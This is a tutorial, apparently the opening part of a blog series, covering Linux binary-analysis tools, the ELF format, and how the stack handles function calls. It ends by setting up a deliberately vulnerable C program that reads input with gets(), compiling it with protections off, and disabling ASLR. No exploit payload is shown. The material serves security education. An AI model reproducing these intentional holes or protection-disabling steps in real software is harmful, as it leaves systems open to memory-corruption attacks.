1. Understanding Stack-Based Buffer Overflows

Decoding the Binary: A Prelude to Linux Stack Smashing and Exploit Development

Before diving into the world of Linux stack smashing, it’s crucial to begin with binary analysis. Analyzing the binary executable provides us with valuable insights into its structure, functions, and potential vulnerabilities. Through binary analysis, we can identify the layout of the stack, the presence of buffer overflows, and other crucial details that will aid us in crafting our exploit. This initial step sets the foundation for our exploit development process, allowing us to understand the inner workings of the program and how we can manipulate its behavior. Let’s embark on this journey of analysis to unravel the secrets hidden within the binary.

Following tools can be used to analyze the binary:

1. file

One of the fundamental tools in binary analysis is the file command. This versatile tool provides essential information about a binary file’s type, architecture, and more. The file command starts by looking at the “magic numbers” or file signatures present in the file. file uses a database called magic.mgc or magic to map file signatures to file types.

Here’s an example of using the file command and its output:

$ file /bin/ls
/bin/ls: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=5a23a3d88888f69f1ae22e25a8f32d5a36f1662f, for GNU/Linux 3.2.0, stripped

The output tells us that it’s an ELF (Executable and Linkable Format) 64-bit binary for an x86-64 architecture, dynamically linked, and stripped of debugging symbols.

2. ldd

The ldd command is a valuable tool for examining the shared library dependencies of an executable or a shared library in a Linux system. When run with the path to an executable, ldd displays a list of the shared libraries that the executable is linked against. This information is crucial for understanding the runtime environment required by the executable and ensuring that all necessary libraries are present on the system. It’s important to note that ldd works with dynamically linked binaries. If a binary is statically linked (meaning it includes all necessary libraries within itself), ldd will not provide any output related to shared library dependencies.

Refer file_dyn and file_stat in my github repo.

$ gcc file.c -o file_dyn
$ ldd file_dyn
	linux-vdso.so.1 (0x00007ffdcd9e8000)
	libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f977b625000)
	/lib64/ld-linux-x86-64.so.2 (0x00007f977b837000)

Each line in the output corresponds to a shared library, along with its full path on the system and the memory address at which it is loaded. This information helps in troubleshooting missing library dependencies and resolving issues related to shared libraries.

For example, running ldd on a statically linked binary like the following binary will not display any shared library dependencies:

$ gcc -static file.c -o file_stat
$ ldd file_stat
	  not a dynamic executable

Also, you can verify that the size of statically linked library is more than that of dynamically linked.

$ du -h file_stat file_dyn 
720K	file_stat
16K	file_dyn

3. ltrace

After confirming that the given library is dependent on external libraries, it’s time to trace the functions that are called from those libraries. ltrace is a dynamic tracing utility in Linux that enables us to intercept and display library calls made by an executed program. By running ltrace followed by the path to an executable, we can observe the library functions being called, along with the arguments passed to them. This tool is invaluable for understanding how a program interacts with shared libraries at runtime, providing insights into its behavior and aiding in debugging and analysis. To illustrate the utility of ltrace in binary analysis, let’s consider a scenario where we have a shared library libadd.so that exports an add function, which takes two integers as parameters and returns their sum.

First, we’ll create the libadd.so library with a simple add function:

$ gcc -shared -fPIC add.c -o libadd.so

Now, let’s create a program that uses this add function from libadd.so.

$ gcc -o useAdd useAdd.c -L. -ladd

Now, here comes the exciting part. We can use ltrace to trace the library calls made by main to libadd.so:

$ LD_LIBRARY_PATH=. ltrace ./useAdd
add(5, 3, 3, 0x55a0de3cbdc8)                           = 8
printf("The sum of %d and %d is %d\n", 5, 3, 8The sum of 5 and 3 is 8
)        = 24
+++ exited (status 0) +++

The output will show the add function being called with the arguments 5 and 3, and the resulting sum 8.

4. hexdump

When it comes to binary analysis, one of the essential tools in a Linux developer’s arsenal is hexdump. This command-line utility allows us to examine and manipulate binary files at a byte level, providing a hexadecimal and ASCII representation of the file’s contents.

$ hexdump [options] [file]

Here are a few common options:

  -C: Display the output in a canonical hex+ASCII display.
  -n: Limit the number of bytes to dump.
  -s: Skip a number of bytes from the beginning.

We will inspect first 64 bytes of file_dyn:

$ hexdump -C -n 64 file_dyn 
00000000  7f 45 4c 46 02 01 01 00  00 00 00 00 00 00 00 00  |.ELF............|
00000010  03 00 3e 00 01 00 00 00  50 10 00 00 00 00 00 00  |..>.....P.......|
00000020  40 00 00 00 00 00 00 00  90 36 00 00 00 00 00 00  |@........6......|
00000030  00 00 00 00 40 00 38 00  0d 00 40 00 1f 00 1e 00  |....@.8...@.....|
00000040

While hexdump is a powerful utility, there is an alternative tool called xxd, which also allows for viewing binary files in a hex format.

$ xxd -l 64 file_dyn
00000000: 7f45 4c46 0201 0100 0000 0000 0000 0000  .ELF............
00000010: 0300 3e00 0100 0000 5010 0000 0000 0000  ..>.....P.......
00000020: 4000 0000 0000 0000 9036 0000 0000 0000  @........6......
00000030: 0000 0000 4000 3800 0d00 4000 1f00 1e00  ....@.8...@.....

5. strings

Now that we’ve examined the binary at byte level, let’s move on to another useful tool in binary analysis: the strings command. The strings command in Linux is a simple yet powerful utility that extracts readable strings from binary files. The -n option specifies the minimum string length to be included in the output.

$ strings -n 6 file_dyn
/lib64/ld-linux-x86-64.so.2
...
libc.so.6
...
Hello World
GCC: (Debian 14.2.0-6) 14.2.0
...
file.c
...

This command extracts printable strings from the file_dyn binary, but it only includes strings that are at least 6 characters long. Strings extraction is a crucial initial step in binary reverse engineering and forensic analysis. It uncovers valuable clues about a binary’s purpose, origin, and potential errors or debug information embedded within.

6. readelf

Another essential tool in the binary analysis toolkit is readelf. This command-line utility is used to display information about ELF (Executable and Linkable Format) files, providing detailed insights into the structure of binary executables and shared libraries.

Commonly used command line arguments

  • File Header (-h/--file-header)

This options displays the ELF file header of a binary file.

$ readelf -h file_dyn
ELF Header:
  Magic:   7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 
  Class:                             ELF64
  Data:                              2's complement, little endian
  Version:                           1 (current)
  OS/ABI:                            UNIX - System V
  ABI Version:                       0
  Type:                              DYN (Position-Independent Executable file)
  Machine:                           Advanced Micro Devices X86-64
  Version:                           0x1
  Entry point address:               0x1050
  Start of program headers:          64 (bytes into file)
  Start of section headers:          13968 (bytes into file)
  Flags:                             0x0
  Size of this header:               64 (bytes)
  Size of program headers:           56 (bytes)
  Number of program headers:         13
  Size of section headers:           64 (bytes)
  Number of section headers:         31
  Section header string table index: 30
  • Program Headers (-l/--program-headers)

Program headers describe segments’ layout in the binary. This information is vital for understanding memory mapping and the executable’s load address.

  • Section Headers (-S/--section-headers)

This option displays detailed information about each section in the ELF file. Section headers include names, types, addresses, sizes, and other attributes.

$ readelf -S file_dyn
There are 31 section headers, starting at offset 0x3690:

Section Headers:
  [Nr] Name              Type             Address           Offset
       Size              EntSize          Flags  Link  Info  Align
  [ 0]                   NULL             0000000000000000  00000000
       0000000000000000  0000000000000000           0     0     0
  [ 1] .interp           PROGBITS         0000000000000318  00000318
       000000000000001c  0000000000000000   A       0     0     1
  [ 2] .note.gnu.pr[...] NOTE             0000000000000338  00000338
       0000000000000020  0000000000000000   A       0     0     8
  [ 3] .note.gnu.bu[...] NOTE             0000000000000358  00000358
       0000000000000024  0000000000000000   A       0     0     4
  [ 4] .note.ABI-tag     NOTE             000000000000037c  0000037c
       0000000000000020  0000000000000000   A       0     0     4
  [ 5] .gnu.hash         GNU_HASH         00000000000003a0  000003a0
       0000000000000024  0000000000000000   A       6     0     8
  [ 6] .dynsym           DYNSYM           00000000000003c8  000003c8
       00000000000000a8  0000000000000018   A       7     1     8
  [ 7] .dynstr           STRTAB           0000000000000470  00000470
       000000000000008d  0000000000000000   A       0     0     1
  [ 8] .gnu.version      VERSYM           00000000000004fe  000004fe
       000000000000000e  0000000000000002   A       6     0     2
  [ 9] .gnu.version_r    VERNEED          0000000000000510  00000510
       0000000000000030  0000000000000000   A       7     1     8
  [10] .rela.dyn         RELA             0000000000000540  00000540
       00000000000000c0  0000000000000018   A       6     0     8
  [11] .rela.plt         RELA             0000000000000600  00000600
       0000000000000018  0000000000000018  AI       6    24     8
  [12] .init             PROGBITS         0000000000001000  00001000
       0000000000000017  0000000000000000  AX       0     0     4
  [13] .plt              PROGBITS         0000000000001020  00001020
       0000000000000020  0000000000000010  AX       0     0     16
  [14] .plt.got          PROGBITS         0000000000001040  00001040
       0000000000000008  0000000000000008  AX       0     0     8
  [15] .text             PROGBITS         0000000000001050  00001050
       0000000000000103  0000000000000000  AX       0     0     16
  [16] .fini             PROGBITS         0000000000001154  00001154
       0000000000000009  0000000000000000  AX       0     0     4
  [17] .rodata           PROGBITS         0000000000002000  00002000
       0000000000000010  0000000000000000   A       0     0     4
  [18] .eh_frame_hdr     PROGBITS         0000000000002010  00002010
       000000000000002c  0000000000000000   A       0     0     4
  [19] .eh_frame         PROGBITS         0000000000002040  00002040
       00000000000000ac  0000000000000000   A       0     0     8
  [20] .init_array       INIT_ARRAY       0000000000003dd0  00002dd0
       0000000000000008  0000000000000008  WA       0     0     8
  [21] .fini_array       FINI_ARRAY       0000000000003dd8  00002dd8
       0000000000000008  0000000000000008  WA       0     0     8
  [22] .dynamic          DYNAMIC          0000000000003de0  00002de0
       00000000000001e0  0000000000000010  WA       7     0     8
  [23] .got              PROGBITS         0000000000003fc0  00002fc0
       0000000000000028  0000000000000008  WA       0     0     8
  [24] .got.plt          PROGBITS         0000000000003fe8  00002fe8
       0000000000000020  0000000000000008  WA       0     0     8
  [25] .data             PROGBITS         0000000000004008  00003008
       0000000000000010  0000000000000000  WA       0     0     8
  [26] .bss              NOBITS           0000000000004018  00003018
       0000000000000008  0000000000000000  WA       0     0     1
  [27] .comment          PROGBITS         0000000000000000  00003018
       000000000000001f  0000000000000001  MS       0     0     1
  [28] .symtab           SYMTAB           0000000000000000  00003038
       0000000000000360  0000000000000018          29    18     8
  [29] .strtab           STRTAB           0000000000000000  00003398
       00000000000001da  0000000000000000           0     0     1
  [30] .shstrtab         STRTAB           0000000000000000  00003572
       000000000000011a  0000000000000000           0     0     1
Key to Flags:
  W (write), A (alloc), X (execute), M (merge), S (strings), I (info),
  L (link order), O (extra OS processing required), G (group), T (TLS),
  C (compressed), x (unknown), o (OS specific), E (exclude),
  D (mbind), l (large), p (processor specific)
  • Symbol Table (-s/--syms/--symbols)

The symbol table contains information about symbols used in the binary, including functions and variables. This is invaluable for understanding program logic.

$ readelf -s file_dyn

Symbol table '.dynsym' contains 7 entries:
   Num:    Value          Size Type    Bind   Vis      Ndx Name
     0: 0000000000000000     0 NOTYPE  LOCAL  DEFAULT  UND 
     1: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND _[...]@GLIBC_2.34 (2)
     2: 0000000000000000     0 NOTYPE  WEAK   DEFAULT  UND _ITM_deregisterT[...]
     3: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND puts@GLIBC_2.2.5 (3)
     4: 0000000000000000     0 NOTYPE  WEAK   DEFAULT  UND __gmon_start__
     5: 0000000000000000     0 NOTYPE  WEAK   DEFAULT  UND _ITM_registerTMC[...]
     6: 0000000000000000     0 FUNC    WEAK   DEFAULT  UND [...]@GLIBC_2.2.5 (3)

Symbol table '.symtab' contains 36 entries:
   Num:    Value          Size Type    Bind   Vis      Ndx Name
     0: 0000000000000000     0 NOTYPE  LOCAL  DEFAULT  UND 
     1: 0000000000000000     0 FILE    LOCAL  DEFAULT  ABS Scrt1.o
     2: 000000000000037c    32 OBJECT  LOCAL  DEFAULT    4 __abi_tag
     3: 0000000000000000     0 FILE    LOCAL  DEFAULT  ABS crtstuff.c
     4: 0000000000001080     0 FUNC    LOCAL  DEFAULT   15 deregister_tm_clones
     5: 00000000000010b0     0 FUNC    LOCAL  DEFAULT   15 register_tm_clones
     6: 00000000000010f0     0 FUNC    LOCAL  DEFAULT   15 __do_global_dtors_aux
     7: 0000000000004018     1 OBJECT  LOCAL  DEFAULT   26 completed.0
     8: 0000000000003dd8     0 OBJECT  LOCAL  DEFAULT   21 __do_global_dtor[...]
     9: 0000000000001130     0 FUNC    LOCAL  DEFAULT   15 frame_dummy
    10: 0000000000003dd0     0 OBJECT  LOCAL  DEFAULT   20 __frame_dummy_in[...]
    11: 0000000000000000     0 FILE    LOCAL  DEFAULT  ABS file.c
    12: 0000000000000000     0 FILE    LOCAL  DEFAULT  ABS crtstuff.c
    13: 00000000000020e8     0 OBJECT  LOCAL  DEFAULT   19 __FRAME_END__
    14: 0000000000000000     0 FILE    LOCAL  DEFAULT  ABS 
    15: 0000000000003de0     0 OBJECT  LOCAL  DEFAULT   22 _DYNAMIC
    16: 0000000000002010     0 NOTYPE  LOCAL  DEFAULT   18 __GNU_EH_FRAME_HDR
    17: 0000000000003fe8     0 OBJECT  LOCAL  DEFAULT   24 _GLOBAL_OFFSET_TABLE_
    18: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND __libc_start_mai[...]
    19: 0000000000000000     0 NOTYPE  WEAK   DEFAULT  UND _ITM_deregisterT[...]
    20: 0000000000004008     0 NOTYPE  WEAK   DEFAULT   25 data_start
    21: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND puts@GLIBC_2.2.5
    22: 0000000000004018     0 NOTYPE  GLOBAL DEFAULT   25 _edata
    23: 0000000000001154     0 FUNC    GLOBAL HIDDEN    16 _fini
    24: 0000000000004008     0 NOTYPE  GLOBAL DEFAULT   25 __data_start
    25: 0000000000000000     0 NOTYPE  WEAK   DEFAULT  UND __gmon_start__
    26: 0000000000004010     0 OBJECT  GLOBAL HIDDEN    25 __dso_handle
    27: 0000000000002000     4 OBJECT  GLOBAL DEFAULT   17 _IO_stdin_used
    28: 0000000000004020     0 NOTYPE  GLOBAL DEFAULT   26 _end
    29: 0000000000001050    34 FUNC    GLOBAL DEFAULT   15 _start
    30: 0000000000004018     0 NOTYPE  GLOBAL DEFAULT   26 __bss_start
    31: 0000000000001139    26 FUNC    GLOBAL DEFAULT   15 main
    32: 0000000000004018     0 OBJECT  GLOBAL HIDDEN    25 __TMC_END__
    33: 0000000000000000     0 NOTYPE  WEAK   DEFAULT  UND _ITM_registerTMC[...]
    34: 0000000000000000     0 FUNC    WEAK   DEFAULT  UND __cxa_finalize@G[...]
    35: 0000000000001000     0 FUNC    GLOBAL HIDDEN    12 _init
  • Dynamic Section (-d/--dynamic)

This option reveals the dynamic linking information, including shared library dependencies and versioning details. No dynamic linking information will be displayed for statically linked binaries, as they do not rely on shared libraries at runtime.

$ readelf -d file_dyn 

Dynamic section at offset 0x2de0 contains 26 entries:
  Tag        Type                         Name/Value
 0x0000000000000001 (NEEDED)             Shared library: [libc.so.6]
 0x000000000000000c (INIT)               0x1000
 0x000000000000000d (FINI)               0x1154
 0x0000000000000019 (INIT_ARRAY)         0x3dd0
 0x000000000000001b (INIT_ARRAYSZ)       8 (bytes)
 0x000000000000001a (FINI_ARRAY)         0x3dd8
 0x000000000000001c (FINI_ARRAYSZ)       8 (bytes)
 0x000000006ffffef5 (GNU_HASH)           0x3a0
 0x0000000000000005 (STRTAB)             0x470
 0x0000000000000006 (SYMTAB)             0x3c8
 0x000000000000000a (STRSZ)              141 (bytes)
 0x000000000000000b (SYMENT)             24 (bytes)
 0x0000000000000015 (DEBUG)              0x0
 0x0000000000000003 (PLTGOT)             0x3fe8
 0x0000000000000002 (PLTRELSZ)           24 (bytes)
 0x0000000000000014 (PLTREL)             RELA
 0x0000000000000017 (JMPREL)             0x600
 0x0000000000000007 (RELA)               0x540
 0x0000000000000008 (RELASZ)             192 (bytes)
 0x0000000000000009 (RELAENT)            24 (bytes)
 0x000000006ffffffb (FLAGS_1)            Flags: PIE
 0x000000006ffffffe (VERNEED)            0x510
 0x000000006fffffff (VERNEEDNUM)         1
 0x000000006ffffff0 (VERSYM)             0x4fe
 0x000000006ffffff9 (RELACOUNT)          3
 0x0000000000000000 (NULL)               0x0

$ readelf -d file_stat 

There is no dynamic section in this file.
  • Section Headers and Their Contents (-x/--hex-dump=)

This option displays the hexadecimal and ASCII representation of the content of a specific section. For instance, to examine the .text section

$ readelf -x .text file_dyn

Hex dump of section '.text':
  0x00001050 31ed4989 d15e4889 e24883e4 f0505445 1.I..^H..H...PTE
  0x00001060 31c031c9 488d3dce 000000ff 154f2f00 1.1.H.=......O/.
  0x00001070 00f4662e 0f1f8400 00000000 0f1f4000 ..f...........@.
  0x00001080 488d3d91 2f000048 8d058a2f 00004839 H.=./..H.../..H9
  0x00001090 f8741548 8b052e2f 00004885 c07409ff .t.H.../..H..t..
  0x000010a0 e00f1f80 00000000 c30f1f80 00000000 ................
  0x000010b0 488d3d61 2f000048 8d355a2f 00004829 H.=a/..H.5Z/..H)
  0x000010c0 fe4889f0 48c1ee3f 48c1f803 4801c648 .H..H..?H...H..H
  0x000010d0 d1fe7414 488b05fd 2e000048 85c07408 ..t.H......H..t.
  0x000010e0 ffe0660f 1f440000 c30f1f80 00000000 ..f..D..........
  0x000010f0 f30f1efa 803d1d2f 00000075 2b554883 .....=./...u+UH.
  0x00001100 3dda2e00 00004889 e5740c48 8b3dfe2e =.....H..t.H.=..
  0x00001110 0000e829 ffffffe8 64ffffff c605f52e ...)....d.......
  0x00001120 0000015d c30f1f00 c30f1f80 00000000 ...]............
  0x00001130 f30f1efa e977ffff ff554889 e5488d05 .....w...UH..H..
  0x00001140 c00e0000 4889c7e8 e4feffff b8000000 ....H...........
  0x00001150 005dc3                              .].
  • Display Dynamic String Table (--dyn-syms)

This option prints dynamic symbols, which are essential for dynamic linking analysis.

$ readelf --dyn-syms file_dyn

Symbol table '.dynsym' contains 7 entries:
   Num:    Value          Size Type    Bind   Vis      Ndx Name
     0: 0000000000000000     0 NOTYPE  LOCAL  DEFAULT  UND 
     1: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND _[...]@GLIBC_2.34 (2)
     2: 0000000000000000     0 NOTYPE  WEAK   DEFAULT  UND _ITM_deregisterT[...]
     3: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND puts@GLIBC_2.2.5 (3)
     4: 0000000000000000     0 NOTYPE  WEAK   DEFAULT  UND __gmon_start__
     5: 0000000000000000     0 NOTYPE  WEAK   DEFAULT  UND _ITM_registerTMC[...]
     6: 0000000000000000     0 FUNC    WEAK   DEFAULT  UND [...]@GLIBC_2.2.5 (3)

7. objdump

Objdump, a part of the GNU Binutils suite, is a versatile command-line tool that serves as a Swiss Army knife for binary analysis. It offers a wide range of options to examine object files, executables, shared libraries, and core dump files. Binaries are generated when source code is compiled, producing machine language instructions specific to the CPU architecture. Objdump reads these binaries and displays their architecture-specific assembly language instructions, providing insights into program operations at the CPU level.

Example Usages:

  • Disassemble an Executable
$ objdump -d file_dyn
  • Display File Header Information (-f/--file-headers)
$ objdump -f file_dyn
  • Display Section Headers (-h/--section-headers)
$ objdump -h file_dyn

8. strace

A system call is a mechanism that allows user-space programs to request services from the kernel, effectively bridging the gap between the user and the system. When a program makes a system call, it transitions from user mode to kernel mode, which provides the necessary privileges to perform operations that are otherwise restricted in user mode. strace is a powerful diagnostic tool used in Linux and Unix-like operating systems to monitor system calls and signals. This command-line utility is invaluable for troubleshooting and understanding how programs interact with the operating system kernel. By tracing the system calls made by a program, developers and system administrators can gain insights into its behavior, identify issues such as file access problems or incorrect permissions, and optimize performance. If you have used ltrace, mentioned earlier, think of strace being similar. The only difference is that, instead of calling a library, the strace utility traces system calls. System calls are how you interface with the kernel to get work done.

System Call Image Source: scaler

By default, strace does not trace child processes. To trace them as well, use the -f option:

$ strace -f file_dyn

To view the system calls along with their arguments:

$ strace -f -v file_dyn

9. nm

The nm command in Linux stands for Name Mangler. It is used to list symbols from object files, such as .o files, static libraries (.a files), and shared libraries (.so files). The nm command provides information about the symbols in these files, including their names, addresses, and types, which is useful for debugging and analyzing compiled code.

  • List Symbols in an Object File
$ # Compile a C source file into an object file using the following command:
$ gcc -c file.c
$ nm file.o
0000000000000000 T main
                 U puts

The first column shows the address of the symbol in hexadecimal. For the main function, this is 0000000000000000, indicating that it is defined but not yet assigned a memory address since it is still in the object file state.

Symbol Type:

  • T: This indicates that main is a defined symbol (function) and is stored in the text (code) section of the object file. The capital T signifies that it is a global symbol, meaning it can be referenced from other object files or libraries.
  • U: The puts function is marked as undefined. This means that the puts function is referenced in file.c but is not defined in the object file. Instead, it will be resolved during the linking stage, where the linker will find the implementation of puts in the standard C library.

Here’s a list of the common symbol types recognized by the nm command in Linux:

Character Symbol Type Description
T Text (code) The symbol is defined in the text (code) section of the object file and is globally accessible (externally visible).
t Text (code) The symbol is defined in the text section but is local to the object file (not externally visible).
D Data The symbol is defined in the initialized data section and is globally accessible.
d Data The symbol is defined in the initialized data section but is local to the object file.
B BSS (uninitialized data) The symbol is defined in the uninitialized data section and is globally accessible.
b BSS (uninitialized data) The symbol is defined in the uninitialized data section but is local to the object file.
R Read-only data The symbol is defined in the read-only data section and is globally accessible.
r Read-only data The symbol is defined in the read-only data section but is local to the object file.
U Undefined The symbol is referenced but not defined in the object file. It must be resolved during linking.
W Weak symbol The symbol is a weak definition, which means it may be overridden by a strong definition in another object file.
V Weak symbol (versioned) A weak symbol with versioning information.
N Debugging symbol The symbol is a debugging symbol (like a file scope) and is not relevant for the actual executable code.
S Symbol from a shared library The symbol comes from a shared library but is not defined in the object file itself.
? Unknown The symbol type is unknown or cannot be determined.
  • Display Dynamic Symbols (usually found in shared libraries):
$ nm -D libadd.so
  • List Symbols and Apply numeric sort on the addresses:
$ nm -n file_dyn

10. gdb

GDB (GNU Debugger) is a powerful command-line debugger for Unix-like systems. It allows developers to inspect and debug programs, providing a wide range of features for analyzing and manipulating the execution of code. From setting breakpoints to examining memory to stepping through code line-by-line, GDB is an essential tool for understanding and fixing software issues.

  • Start GDB with Program
$ gdb file_dyn
  • Set Breakpoints
(gdb) break <line_number>
(gdb) break 10
  • To run the program:
(gdb) run
  • Continue Execution
(gdb) continue
  • Print Variable Value
(gdb) print <variable>

If you’re ready to delve deeper into the world of debugging and unlock its full potential, I invite you to check out my blog post titled “GDB: Zero to Hero.” In this advanced guide, you’ll discover a comprehensive tutorial on mastering the GNU Debugger (GDB) from scratch. Learn advanced debugging techniques, explore powerful features, and elevate your debugging skills to the next level.

Read “GDB: Zero to Hero”.

For a deeper understanding of binary analysis, I will be writing a blog post on this topic soon.

ELF 101

The Executable and Linkable Format (ELF) is a common standard file format for executable files, object code, shared libraries, and core dumps in Unix-like operating systems, including Linux. It provides a flexible and extensible structure for binary files, making it easier for the operating system to load and execute them.

Key Features of ELF

  • Portability: ELF files can be used across different hardware architectures and operating systems, facilitating cross-platform development.
  • Modularity: ELF supports dynamic linking and loading, allowing programs to use shared libraries and load modules at runtime.
  • Extensibility: The ELF format is designed to be extensible, enabling the addition of new sections and types without breaking compatibility.

Structure of ELF

An ELF file is divided into several key components:

  1. ELF Header: Contains metadata about the file, such as the architecture, entry point address, and the program and section header table offsets.
  2. Program Header Table: Describes the segments of the file used during program execution, providing information needed for the operating system to load the program into memory.
  3. Section Header Table: Contains information about the sections of the file, such as text (code), data, and symbol tables, which are useful during linking and debugging.
  4. Sections: Individual components within the ELF file, each serving a specific purpose, including:
    • .text: Contains the executable code.
    • .data: Holds initialized global and static variables.
    • .bss: Contains uninitialized global and static variables.
    • .rodata: Contains read-only data, such as string literals.
    • .symtab: Symbol table for linking and debugging.

To determine the type of an ELF file, you can use the readelf and file commands in Linux.

$ # $ readelf -h <binary>
$ readelf -h file_dyn
...
  Type:                              DYN (Position-Independent Executable file)
...
$ readelf -h file.o
...
  Type:                              REL (Relocatable file)
...

Types of ELF Files

Executable ELF (EXEC):

  • Purpose: Contains a program that is ready to be executed by the operating system.
  • Characteristics: Has a defined entry point and is directly runnable.

Dynamic ELF (DYN):

  • Purpose: Used for shared libraries that can be linked at runtime.
  • Characteristics: Supports dynamic linking, allowing multiple programs to share the same library in memory.

Relocatable ELF (REL):

  • Purpose: Contains object code that can be linked to create an executable or a shared library.
  • Characteristics: The addresses of symbols are not yet fixed and need to be resolved during the linking process.

Core ELF (CORE):

  • Purpose: A core dump of a process’s memory at the time of a crash.
  • Characteristics: Contains the process’s memory image, including the stack, heap, and CPU registers, useful for debugging.

How the Stack Operates

Before diving into Linux stack smashing, I’d like to take a moment to briefly explain the stack and its significance in program execution.

The stack is a special region of memory that stores temporary variables created by functions. It operates on a Last In, First Out (LIFO) basis, meaning the last item added to the stack is the first one to be removed. Each time a function is called, a new stack frame is created, which contains:

  • Local Variables: Variables that are only accessible within the function.
  • Return Address: The address to which control should return after the function completes.
  • Function Parameters: Values passed to the function from its caller.

Below is a simple program that will help illustrate how the stack works in a C program:

#include <stdio.h>

void myFunc(int a, char *s) {
    printf("1st arg: %d\n", a);
    printf("2nd arg: %s\n", s);
}

int main() {
    int num = 10;
    char *str = "Hello\n";

    myFunc(num, str);
    return 0;          // Added return statement for main
}
$ gcc -m32 stack.c -no-pie -fno-stack-protector -o stack

In this program, we define a function myFunc that takes an integer and a string as arguments. While plain GDB provides basic debugging functionality, it lacks syntax highlighting and many advanced features that can enhance the debugging experience. We can improve GDB’s capabilities by using extensions such as pwndbg or GEF. Personally, I find both extensions useful, but for this series, we’ll focus on using pwndbg. Of course, you’re free to use GEF if you prefer!

$ gdb ./stack
pwndbg> disass main 
Dump of assembler code for function main:
   0x080491a8 <+0>:	lea    ecx,[esp+0x4]
...
   0x080491dc <+52>:	call   0x8049166 <myFunc>
   0x080491e1 <+57>:	add    esp,0x10
...
pwndbg> disass myFunc  
Dump of assembler code for function myFunc:
   0x08049166 <+0>:	push   ebp
   0x08049167 <+1>:	mov    ebp,esp
   0x08049169 <+3>:	push   ebx
   0x0804916a <+4>:	sub    esp,0x4
   0x0804916d <+7>:	call   0x80490a0 <__x86.get_pc_thunk.bx>
   0x08049172 <+12>:	add    ebx,0x2e82
   0x08049178 <+18>:	sub    esp,0x8
   0x0804917b <+21>:	push   DWORD PTR [ebp+0x8]
   0x0804917e <+24>:	lea    eax,[ebx-0x1fec]
   0x08049184 <+30>:	push   eax
   0x08049185 <+31>:	call   0x8049040 <printf@plt>
   0x0804918a <+36>:	add    esp,0x10
   0x0804918d <+39>:	sub    esp,0x8
   0x08049190 <+42>:	push   DWORD PTR [ebp+0xc]
   0x08049193 <+45>:	lea    eax,[ebx-0x1fdf]
   0x08049199 <+51>:	push   eax
   0x0804919a <+52>:	call   0x8049040 <printf@plt>
   0x0804919f <+57>:	add    esp,0x10
   0x080491a2 <+60>:	nop
   0x080491a3 <+61>:	mov    ebx,DWORD PTR [ebp-0x4]
   0x080491a6 <+64>:	leave
   0x080491a7 <+65>:	ret
End of assembler dump.

When myFunc(num, str) is called, a new stack frame is created for myFunc. This stack frame contains:

  • The return address (where the program should continue after myFunc finishes).
  • Local variables a and s, which hold the values passed from main (num and str).

Let’s set a breakpoint at the beginning of myFunc to analyze the stack:

pwndbg> b *myFunc 
Breakpoint 1 at 0x8049166

pwndbg> run

After running the program, we can check the stack state:

pwndbg> stack
00:0000│ esp 0xffffd59c —▸ 0x80491e1 (main+57) ◂— add esp, 0x10
01:0004│-028 0xffffd5a0 ◂— 0xa /* '\n' */
02:0008│-024 0xffffd5a4 —▸ 0x804a022 ◂— 'Hello\n'

As we can see, the return address 0x80491e1 has been pushed onto the stack.

Next, let’s set a breakpoint at the ret instruction inside myFunc:

pwndbg> b *myFunc + 65
Breakpoint 2 at 0x80491a7


pwndbg> c

After hitting the second breakpoint, we can observe that the top of the stack contains the address 0x80491e1. The ret instruction will pop this address off the stack and place it into the EIP register. Let’s use stepi to step through the instruction:

pwndbg> stepi 
pwndbg> reg $eip
 $EIP 0x80491e1 (main+57) ◂— add esp, 0x10

As we can see, the EIP register now holds the return address. This demonstrates how the control flow is managed via the stack during function calls.

Linux Stack Smashing

Now that we’ve covered binary analysis, it’s time to delve into the concept of buffer overflow and its intricacies. 🎉💥

We will use the following vulnerable program vuln.c:

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

void win(){
    printf("You've reached the win function! 🎉\n");
    exit(0);
}

void vuln(){
    char buffer[64]; 
    printf("Enter some text:\n");
    gets(buffer); // Unsafe function - vulnerable to buffer overflow
}

int main() {
    vuln();
    printf("Try Again!\n");
    return 0;
}

To create our vulnerable binary, we’ll compile it with all security checks disabled:

$ gcc -m32 -z execstack -no-pie vuln.c -o vuln

Before we run our newly compiled binary, let’s disable Address Space Layout Randomization (ASLR) to make it easier to exploit:

$ echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

Now, let’s take a moment to check the security features of our binary.

$ pwn checksec vuln
[*] '/home/kali/Desktop/Blogs/Materials/x86_exp_dev/01/vuln'
    Arch:       i386-32-little
    RELRO:      Partial RELRO
    Stack:      No canary found
    NX:         NX unknown - GNU_STACK missing
    PIE:        No PIE (0x8048000)
    Stack:      Executable
    RWX:        Has RWX segments
    Stripped:   No

The checksec utility is included with the pwntools library, a powerful set of tools for binary exploitation. If you haven’t already installed pwntools, you can do so easily using pip. Here’s how:

$ pip install pwntools

Next, let’s break down what each of these security measures means.

  • Arch - i386-32-little: Indicates that the binary is compiled for a 32-bit x86 architecture using little-endian byte order. This is important for understanding compatibility and potential exploits.
  • RELRO: Partial RELRO: RELRO (RELocation Read-Only) is a security feature that makes certain parts of the binary read-only after initialization. Partial RELRO means that only some sections are protected, which is less secure than Full RELRO.
  • Stack: No canary found - Stack canaries are used to detect buffer overflows by placing a special value (canary) before the return address. If the canary is modified, the program terminates, preventing exploitation. The absence of a canary makes the binary vulnerable to such attacks.
  • NX - NX unknown - GNU_STACK missing - NX (No-eXecute) prevents execution of code in certain memory regions. NX unknown means it’s unclear if NX is enforced, and GNU_STACK missing indicates that the binary lacks the necessary flags to specify its execution characteristics.
  • PIE - No PIE (0x8048000) - PIE (Position Independent Executable) allows a binary to be loaded at random memory addresses, enhancing security against certain attacks. The lack of PIE means the binary is loaded at a fixed address, making it easier to predict and exploit.
  • Stack - Executable - This indicates that the stack is marked as executable, which poses a major security risk. Attackers can execute arbitrary code placed on the stack, leading to potential exploits.
  • RWX: Has RWX segments - RWX (Read-Write-Execute) segments are sections of memory that can be read, written, and executed. This is a bad practice, as it allows for code injection attacks. The presence of RWX segments indicates serious security vulnerabilities.
